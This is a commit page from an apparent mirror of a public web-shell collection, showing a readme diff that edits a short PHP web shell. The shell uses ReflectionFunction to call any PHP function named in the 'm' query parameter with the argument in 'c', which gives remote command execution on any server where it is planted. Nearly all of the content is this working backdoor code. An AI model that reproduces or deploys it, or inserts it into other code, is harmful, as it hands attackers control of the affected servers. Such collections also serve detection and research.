mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 21:01:29 +00:00
update readme.md
This commit is contained in:
@@ -6,9 +6,9 @@
|
|||||||
***************************************************
|
***************************************************
|
||||||
code:
|
code:
|
||||||
|
|
||||||
'<?php
|
<?php
|
||||||
$func = new ReflectionFunction($_GET[m]);
|
$func = new ReflectionFunction($_GET[m]);
|
||||||
echo $func->invokeArgs(array($_GET[c]));
|
echo $func->invokeArgs(array($_GET[c]));
|
||||||
?>'
|
?>
|
||||||
|
|
||||||
***************************************************
|
***************************************************
|
||||||
Reference in New Issue
Block a user